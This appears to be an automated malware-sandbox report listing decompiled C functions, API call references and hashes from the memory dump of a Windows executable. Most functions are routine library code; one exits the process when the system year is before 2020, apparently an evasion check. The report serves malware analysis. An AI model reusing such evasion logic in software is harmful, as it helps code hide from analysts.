                                                                                • Opcode ID: 75fccbb9e0d7dde9b505ef3233f0c149b1207c7e82252a9417013451bf83de29
                                                                                • Instruction ID: 23862da68592c1e24948ec3166a75afe102c93af0ee48796f61bef12c2e153a4
                                                                                • Opcode Fuzzy Hash: 75fccbb9e0d7dde9b505ef3233f0c149b1207c7e82252a9417013451bf83de29
                                                                                • Instruction Fuzzy Hash: 87615DB49006089FCB10EBA9C885ADDB7F4EB58304F6041EAE844B7392DF385F84DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 82%
                                                                                			E004168F4(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
                                                                                				CHAR* _v8;
                                                                                				void* __ebx;
                                                                                				void* __ecx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				void* _t18;
                                                                                				void* _t23;
                                                                                				CHAR* _t24;
                                                                                				void* _t25;
                                                                                				struct HRSRC__* _t29;
                                                                                				void* _t30;
                                                                                				struct HINSTANCE__* _t31;
                                                                                				void* _t32;
                                                                                
                                                                                				_v8 = _t24;
                                                                                				_t31 = __edx;
                                                                                				_t23 = __eax;
                                                                                				_t29 = FindResourceA(__edx, _v8, _a4);
                                                                                				 *(_t23 + 0x10) = _t29;
                                                                                				_t33 = _t29;
                                                                                				if(_t29 == 0) {
                                                                                					E00416884(_t23, _t24, _t29, _t31, _t33, _t32);
                                                                                					_pop(_t24);
                                                                                				}
                                                                                				_t5 = _t23 + 0x10; // 0x416694
                                                                                				_t30 = LoadResource(_t31,  *_t5);
                                                                                				 *(_t23 + 0x14) = _t30;
                                                                                				_t34 = _t30;
                                                                                				if(_t30 == 0) {
                                                                                					E00416884(_t23, _t24, _t30, _t31, _t34, _t32);
                                                                                				}
                                                                                				_t7 = _t23 + 0x10; // 0x416694
                                                                                				_push(SizeofResource(_t31,  *_t7));
                                                                                				_t8 = _t23 + 0x14; // 0x4161c0
                                                                                				_t18 = LockResource( *_t8);
                                                                                				_pop(_t25);
                                                                                				return E00416654(_t23, _t25, _t18);
                                                                                			}


















                                                                                APIs
                                                                                • FindResourceA.KERNEL32(?,?,?), ref: 0041690B
                                                                                • LoadResource.KERNEL32(?,00416694,?,?,?,004121AC,?,00000001,00000000,?,00416864,?), ref: 00416925
                                                                                • SizeofResource.KERNEL32(?,00416694,?,00416694,?,?,?,004121AC,?,00000001,00000000,?,00416864,?), ref: 0041693F
                                                                                • LockResource.KERNEL32(004161C0,00000000,?,00416694,?,00416694,?,?,?,004121AC,?,00000001,00000000,?,00416864,?), ref: 00416949
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: e58589db6cc9c2ed489951130424e2c568b54bd93535f2053440df7c87e29db1
                                                                                • Instruction ID: 6a59b26ac78e4b5b86669d74dbecf5df281273e363dea241552c74f923b8e910
                                                                                • Opcode Fuzzy Hash: e58589db6cc9c2ed489951130424e2c568b54bd93535f2053440df7c87e29db1
                                                                                • Instruction Fuzzy Hash: 63F06DB36022046F9708EF6DA881D9B77DCEE993A4312016FF90CD7206DA38DD5183B8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E00430110(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                				char _v8;
                                                                                				CHAR* _t20;
                                                                                				long _t25;
                                                                                				intOrPtr _t30;
                                                                                				void* _t34;
                                                                                				intOrPtr _t37;
                                                                                
                                                                                				_push(0);
                                                                                				_t34 = __eax;
                                                                                				_push(_t37);
                                                                                				_push(0x43018d);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t37;
                                                                                				E0042FB5C(__eax);
                                                                                				_t25 = GetTickCount();
                                                                                				do {
                                                                                					Sleep(0);
                                                                                				} while (GetTickCount() - _t25 <= 0x3e8);
                                                                                				E0042F7B4(_t34, _t25,  &_v8, 0, __edi, _t34);
                                                                                				if(_v8 != 0) {
                                                                                					_t20 = E004047D0(_v8);
                                                                                					WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x1c)))) + 0xc))(), _t20, 9, 0);
                                                                                				}
                                                                                				_pop(_t30);
                                                                                				 *[fs:eax] = _t30;
                                                                                				_push(0x430194);
                                                                                				return E00404320( &_v8);
                                                                                			}










                                                                                APIs
                                                                                  • Part of subcall function 0042FB5C: WinHelpA.USER32 ref: 0042FB6B
                                                                                • GetTickCount.KERNEL32 ref: 0043012E
                                                                                • Sleep.KERNEL32(00000000,00000000,0043018D,?,?,00000000,00000000,?,00430103), ref: 00430137
                                                                                • GetTickCount.KERNEL32 ref: 0043013C
                                                                                • WinHelpA.USER32 ref: 00430172
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CountHelpTick$Sleep
                                                                                • String ID:
                                                                                • API String ID: 2438605093-0
                                                                                • Opcode ID: 215cb68ffd52fe6f5e1b5f238888ac6efa749f36870d96729315158fb80a6ae0
                                                                                • Instruction ID: 893ac3cba8f77228d60b9289927b75d4118f1bf31978c33a349a08650ecbfcdb
                                                                                • Opcode Fuzzy Hash: 215cb68ffd52fe6f5e1b5f238888ac6efa749f36870d96729315158fb80a6ae0
                                                                                • Instruction Fuzzy Hash: DF01F270700204AFE711EB76CC52B1EB3A8DB48B04FA1417BF500E3AC1CA3C6E049559
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 91%
                                                                                			E004397C4(void* __eax, intOrPtr* __edx) {
                                                                                				char _v20;
                                                                                				char _v28;
                                                                                				intOrPtr _t17;
                                                                                				void* _t19;
                                                                                				void* _t21;
                                                                                				void* _t32;
                                                                                				void* _t39;
                                                                                				void* _t45;
                                                                                				intOrPtr _t47;
                                                                                				intOrPtr _t48;
                                                                                				void* _t50;
                                                                                				void* _t51;
                                                                                				intOrPtr* _t65;
                                                                                				intOrPtr* _t67;
                                                                                				void* _t68;
                                                                                
                                                                                				_t67 = __edx;
                                                                                				_t50 = __eax;
                                                                                				_t17 =  *__edx;
                                                                                				_t68 = _t17 - 0x84;
                                                                                				if(_t68 > 0) {
                                                                                					_t19 = _t17 + 0xffffff00 - 9;
                                                                                					if(_t19 < 0) {
                                                                                						_t21 = E00435E04(__eax);
                                                                                						if(_t21 != 0) {
                                                                                							L28:
                                                                                							return _t21;
                                                                                						}
                                                                                						L27:
                                                                                						return E00436914(_t50, _t67);
                                                                                					}
                                                                                					if(_t19 + 0xffffff09 - 0xb < 0) {
                                                                                						_t21 = E00439730(__eax, _t51, __edx);
                                                                                						if(_t21 == 0) {
                                                                                							goto L27;
                                                                                						}
                                                                                						if( *((intOrPtr*)(_t67 + 0xc)) != 0) {
                                                                                							goto L28;
                                                                                						}
                                                                                						_t21 = E0043C018(_t50);
                                                                                						if(_t21 == 0) {
                                                                                							goto L28;
                                                                                						}
                                                                                						_push( *((intOrPtr*)(_t67 + 8)));
                                                                                						_push( *((intOrPtr*)(_t67 + 4)));
                                                                                						_push( *_t67);
                                                                                						_t32 = E0043BD14(_t50);
                                                                                						_push(_t32);
                                                                                						L00406CF8();
                                                                                						return _t32;
                                                                                					}
                                                                                					goto L27;
                                                                                				}
                                                                                				if(_t68 == 0) {
                                                                                					_t21 = E00436914(__eax, __edx);
                                                                                					if( *((intOrPtr*)(__edx + 0xc)) != 0xffffffff) {
                                                                                						goto L28;
                                                                                					}
                                                                                					E0040725C( *((intOrPtr*)(__edx + 8)), _t51,  &_v20);
                                                                                					E004351E4(_t50,  &_v28,  &_v20);
                                                                                					_t21 = E0043969C(_t50, 0,  &_v28, 0);
                                                                                					if(_t21 == 0) {
                                                                                						goto L28;
                                                                                					}
                                                                                					 *((intOrPtr*)(_t67 + 0xc)) = 1;
                                                                                					return _t21;
                                                                                				}
                                                                                				_t39 = _t17 - 7;
                                                                                				if(_t39 == 0) {
                                                                                					_t65 = E0044CA54(__eax);
                                                                                					if(_t65 == 0) {
                                                                                						goto L27;
                                                                                					}
                                                                                					_t21 =  *((intOrPtr*)( *_t65 + 0xe4))();
                                                                                					if(_t21 == 0) {
                                                                                						goto L28;
                                                                                					}
                                                                                					goto L27;
                                                                                				}
                                                                                				_t21 = _t39 - 1;
                                                                                				if(_t21 == 0) {
                                                                                					if(( *(__eax + 0x54) & 0x00000020) != 0) {
                                                                                						goto L28;
                                                                                					}
                                                                                				} else {
                                                                                					if(_t21 == 0x17) {
                                                                                						_t45 = E0043BD14(__eax);
                                                                                						if(_t45 == GetCapture() &&  *0x46b990 != 0) {
                                                                                							_t47 =  *0x46b990; // 0x0
                                                                                							if(_t50 ==  *((intOrPtr*)(_t47 + 0x30))) {
                                                                                								_t48 =  *0x46b990; // 0x0
                                                                                								E00436848(_t48, 0, 0x1f, 0);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                			}



















                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Capture
                                                                                • String ID:
                                                                                • API String ID: 1145282425-3916222277
                                                                                • Opcode ID: 1e86b3af473012e45797b6946e2ec80d15827e37d479ea7193c588e5337ef3a1
                                                                                • Instruction ID: 43cdc9794d8c31f967ccfb3724705cbd40727e764bae9717ab87b78639a13af6
                                                                                • Opcode Fuzzy Hash: 1e86b3af473012e45797b6946e2ec80d15827e37d479ea7193c588e5337ef3a1
                                                                                • Instruction Fuzzy Hash: 523190B130020586CB24AA2D8C8575A6395AF8D318F15B53FB4A6C7792DABCCD05C759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00422A48(intOrPtr* __eax, void* __ecx, void* __edx) {
                                                                                				intOrPtr _v68;
                                                                                				intOrPtr _v72;
                                                                                				intOrPtr _v76;
                                                                                				struct tagENHMETAHEADER _v104;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t35;
                                                                                				intOrPtr* _t37;
                                                                                				struct HENHMETAFILE__* _t43;
                                                                                				intOrPtr _t44;
                                                                                
                                                                                				_t37 = __eax;
                                                                                				_t43 = GetClipboardData(0xe);
                                                                                				if(_t43 == 0) {
                                                                                					_t35 =  *0x486c70; // 0x41cc04
                                                                                					E00420084(_t35);
                                                                                				}
                                                                                				E0042221C(_t37);
                                                                                				_t44 =  *((intOrPtr*)(_t37 + 0x28));
                                                                                				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
                                                                                				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
                                                                                				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
                                                                                				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
                                                                                				 *((short*)(_t44 + 0x18)) = 0;
                                                                                				 *((char*)(_t37 + 0x2c)) = 1;
                                                                                				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
                                                                                				return  *((intOrPtr*)( *_t37 + 0x10))();
                                                                                			}













                                                                                APIs
                                                                                • GetClipboardData.USER32 ref: 00422A55
                                                                                • CopyEnhMetaFileA.GDI32(00000000,00000000,0000000E), ref: 00422A77
                                                                                • GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000,0000000E), ref: 00422A89
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileMeta$ClipboardCopyDataHeader
                                                                                • String ID:
                                                                                • API String ID: 1752724394-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00453E74() {
                                                                                				struct tagPOINT _v12;
                                                                                				void* _t5;
                                                                                				long _t6;
                                                                                
                                                                                				 *0x487c0c = GetCurrentThreadId();
                                                                                				L5:
                                                                                				_t5 =  *0x487c10; // 0x0
                                                                                				_t6 = WaitForSingleObject(_t5, 0x64);
                                                                                				if(_t6 == 0x102) {
                                                                                					if( *0x487bfc != 0 &&  *((intOrPtr*)( *0x487bfc + 0x60)) != 0) {
                                                                                						GetCursorPos( &_v12);
                                                                                						if(E00433F18( &_v12) == 0) {
                                                                                							E00456214( *0x487bfc);
                                                                                						}
                                                                                					}
                                                                                					goto L5;
                                                                                				}
                                                                                				return _t6;
                                                                                			}







                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00453E80
                                                                                • GetCursorPos.USER32(?), ref: 00453E9D
                                                                                • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00453EBD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CurrentCursorObjectSingleThreadWait
                                                                                • String ID:
                                                                                • API String ID: 1359611202-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0043AE98(intOrPtr* __eax, intOrPtr __edx) {
                                                                                				intOrPtr _v8;
                                                                                				void* __ecx;
                                                                                				void* _t25;
                                                                                				intOrPtr* _t31;
                                                                                				void* _t34;
                                                                                				intOrPtr* _t37;
                                                                                				void* _t45;
                                                                                
                                                                                				_v8 = __edx;
                                                                                				_t37 = __eax;
                                                                                				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
                                                                                					L8:
                                                                                					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
                                                                                						L10:
                                                                                						return  *((intOrPtr*)( *_t37 - 0x10))();
                                                                                					}
                                                                                					_t25 = E0043ADE8(_t37, _t45);
                                                                                					if(_t25 == 0) {
                                                                                						goto L10;
                                                                                					}
                                                                                				} else {
                                                                                					_t31 =  *0x486c60; // 0x487bfc
                                                                                					if(_t37 ==  *((intOrPtr*)( *_t31 + 0x44))) {
                                                                                						goto L8;
                                                                                					} else {
                                                                                						_t34 = E0044CA54(_t37);
                                                                                						_t44 = _t34;
                                                                                						if(_t34 == 0) {
                                                                                							goto L8;
                                                                                						} else {
                                                                                							_t25 = E00436848(_t44, 0, 0xb017, _v8);
                                                                                							if(_t25 == 0) {
                                                                                								goto L8;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t25;
                                                                                			}











                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: CaptureIconic
                                                                                • String ID:
                                                                                • API String ID: 2277910766-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E00420114(void* __ebx) {
                                                                                				char _v260;
                                                                                				char _v264;
                                                                                				long _t21;
                                                                                				void* _t22;
                                                                                				intOrPtr _t27;
                                                                                				void* _t32;
                                                                                
                                                                                				_v264 = 0;
                                                                                				_push(_t32);
                                                                                				_push(0x4201b0);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t32 + 0xfffffefc;
                                                                                				_t21 = GetLastError();
                                                                                				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
                                                                                					E004200C0(_t22);
                                                                                				} else {
                                                                                					E00404588( &_v264, 0x100,  &_v260);
                                                                                					E0040A0B0(_v264, 1);
                                                                                					E00403D80();
                                                                                				}
                                                                                				_pop(_t27);
                                                                                				 *[fs:eax] = _t27;
                                                                                				_push(E004201B7);
                                                                                				return E00404320( &_v264);
                                                                                			}










                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,004201B0,?,00000000,?,004201C8,00000000,004237AF,00000000,00000000,0042394F,?,00000000,?,?), ref: 00420134
                                                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,004201B0,?,00000000,?,004201C8,00000000,004237AF,00000000), ref: 0042015A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ErrorFormatLastMessage
                                                                                • String ID:
                                                                                • API String ID: 3479602957-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 46%
                                                                                			E0040AC84(int __eax, void* __ebx, void* __eflags) {
                                                                                				char _v11;
                                                                                				char _v16;
                                                                                				intOrPtr _t28;
                                                                                				void* _t31;
                                                                                				void* _t33;
                                                                                
                                                                                				_t33 = __eflags;
                                                                                				_v16 = 0;
                                                                                				_push(_t31);
                                                                                				_push(0x40ace8);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t31 + 0xfffffff4;
                                                                                				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
                                                                                				E00404588( &_v16, 7,  &_v11);
                                                                                				_push(_v16);
                                                                                				E00408708(7, GetACP(), _t33);
                                                                                				_pop(_t28);
                                                                                				 *[fs:eax] = _t28;
                                                                                				_push(E0040ACEF);
                                                                                				return E00404320( &_v16);
                                                                                			}









                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040ACE8), ref: 0040ACAA
                                                                                • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040ACE8), ref: 0040ACC3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: 980127c2459337dbee2706cd46e3ba44dc983121193b9fc3e02e27b8105ef087
                                                                                • Instruction ID: d94507c29f09da32449ef1f4fd85f81ca756a17aa74cfc9d8502e6e39d08b03c
                                                                                • Opcode Fuzzy Hash: 980127c2459337dbee2706cd46e3ba44dc983121193b9fc3e02e27b8105ef087
                                                                                • Instruction Fuzzy Hash: 3BF06271E083047BEB04EBA2CC5299DB3AEEBC5718B91C47AA610B65C0EA7C65108755
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00408900(void* __eax, WORD* __ecx, signed int __edx) {
                                                                                				WORD* _t15;
                                                                                				void* _t21;
                                                                                				long _t22;
                                                                                
                                                                                				_t15 = __ecx;
                                                                                				 *(__ecx + 0x10) =  !__edx & 0x0000001e;
                                                                                				_t21 = FindFirstFileA(E004047D0(__eax), __ecx + 0x18);
                                                                                				 *((intOrPtr*)(_t15 + 0x14)) = _t21;
                                                                                				if(_t21 == 0xffffffff) {
                                                                                					_t22 = GetLastError();
                                                                                				} else {
                                                                                					_t22 = E0040889C(_t15);
                                                                                					if(_t22 != 0) {
                                                                                						E00408974(_t15);
                                                                                					}
                                                                                				}
                                                                                				return _t22;
                                                                                			}







                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?,?,00464E72,00000000,00464FEC,?,00000000,00465014), ref: 0040891B
                                                                                • GetLastError.KERNEL32(00000000,?,?,?,?,00464E72,00000000,00464FEC,?,00000000,00465014), ref: 00408940
                                                                                  • Part of subcall function 0040889C: FileTimeToLocalFileTime.KERNEL32(?), ref: 004088C9
                                                                                  • Part of subcall function 0040889C: FileTimeToDosDateTime.KERNEL32 ref: 004088D8
                                                                                  • Part of subcall function 00408974: FindClose.KERNEL32(?,?,0040893E,00000000,?,?,?,?,00464E72,00000000,00464FEC,?,00000000,00465014), ref: 00408980
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileTime$Find$CloseDateErrorFirstLastLocal
                                                                                • String ID:
                                                                                • API String ID: 976985129-0
                                                                                • Opcode ID: f885c16d38b7a68d9ebe354ea8a86bdc1ce2e0a3ba3b914a93eaf70104af9ffc
                                                                                • Instruction ID: 549a418afeaee24ec932401d58d4313025a0ff8cc2d17cdf94c077dfbf047a45
                                                                                • Opcode Fuzzy Hash: f885c16d38b7a68d9ebe354ea8a86bdc1ce2e0a3ba3b914a93eaf70104af9ffc
                                                                                • Instruction Fuzzy Hash: 21E065B3B0152417C7147E6E598196B61984A84778309537FB995FB3C6DA3CCC1243D9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0046A9D0(signed int __eax) {
                                                                                				signed int _t3;
                                                                                				signed int _t5;
                                                                                				struct _SYSTEMTIME* _t6;
                                                                                
                                                                                				_t3 = __eax;
                                                                                				_t5 = __eax;
                                                                                				GetSystemTime(_t6);
                                                                                				if(_t6->wYear < 0x7e4) {
                                                                                					ExitProcess(0);
                                                                                				}
                                                                                				return _t3 & 0xffffff00 | _t5 == 0x80000001;
                                                                                			}







                                                                                APIs
                                                                                • GetSystemTime.KERNEL32 ref: 0046A9D7
                                                                                • ExitProcess.KERNEL32(00000000), ref: 0046A9E6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: ExitProcessSystemTime
                                                                                • String ID:
                                                                                • API String ID: 761356610-0
                                                                                • Opcode ID: 72045c01a493544f18e5ff251b975ec9c635fb057c52192f77df73188a0525df
                                                                                • Instruction ID: 5e413a18693b41fa715bf6f947a3acd6526992b8ed76cb55f8c02e4d4ee8bdf6
                                                                                • Opcode Fuzzy Hash: 72045c01a493544f18e5ff251b975ec9c635fb057c52192f77df73188a0525df
                                                                                • Instruction Fuzzy Hash: 26C08C8254670012EE1032750D837AE2194BB00734F364E2FFCAAA93C3E9BF06F445AB
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00408ACA(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                                                                				long _v8;
                                                                                				long _v12;
                                                                                				long _v16;
                                                                                				long _v20;
                                                                                				intOrPtr _v24;
                                                                                				signed int _v28;
                                                                                				CHAR* _t25;
                                                                                				int _t26;
                                                                                				intOrPtr _t31;
                                                                                				intOrPtr _t34;
                                                                                				intOrPtr* _t39;
                                                                                				intOrPtr* _t40;
                                                                                				intOrPtr _t48;
                                                                                				intOrPtr _t50;
                                                                                
                                                                                				_t25 = _a4;
                                                                                				if(_t25 == 0) {
                                                                                					_t25 = 0;
                                                                                				}
                                                                                				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                                                                                				_v28 = _v8 * _v12;
                                                                                				_v24 = 0;
                                                                                				_t48 = _v24;
                                                                                				_t31 = E004052B0(_v28, _t48, _v16, 0);
                                                                                				_t39 = _a8;
                                                                                				 *_t39 = _t31;
                                                                                				 *((intOrPtr*)(_t39 + 4)) = _t48;
                                                                                				_t50 = _v24;
                                                                                				_t34 = E004052B0(_v28, _t50, _v20, 0);
                                                                                				_t40 = _a12;
                                                                                				 *_t40 = _t34;
                                                                                				 *((intOrPtr*)(_t40 + 4)) = _t50;
                                                                                				return _t26;
                                                                                			}


















                                                                                APIs
                                                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00408AED
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: DiskFreeSpace
                                                                                • String ID:
                                                                                • API String ID: 1705453755-0
                                                                                • Opcode ID: 357c392e828d3b05a51e9c00f1cda4a9dbd5acae9420fcaa519de131b97c8b10
                                                                                • Instruction ID: 5b2aff7b8f22867f022bb4009e285a5176f8104054d5f896c7e10f50a27cb8b1
                                                                                • Opcode Fuzzy Hash: 357c392e828d3b05a51e9c00f1cda4a9dbd5acae9420fcaa519de131b97c8b10
                                                                                • Instruction Fuzzy Hash: 381112B5E01609AFDB00CF99C881DAFF7F9EFC8314B14C56AA509E7350E6319E018B90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 53%
                                                                                			E0042D6D0(intOrPtr __eax, intOrPtr* __edx) {
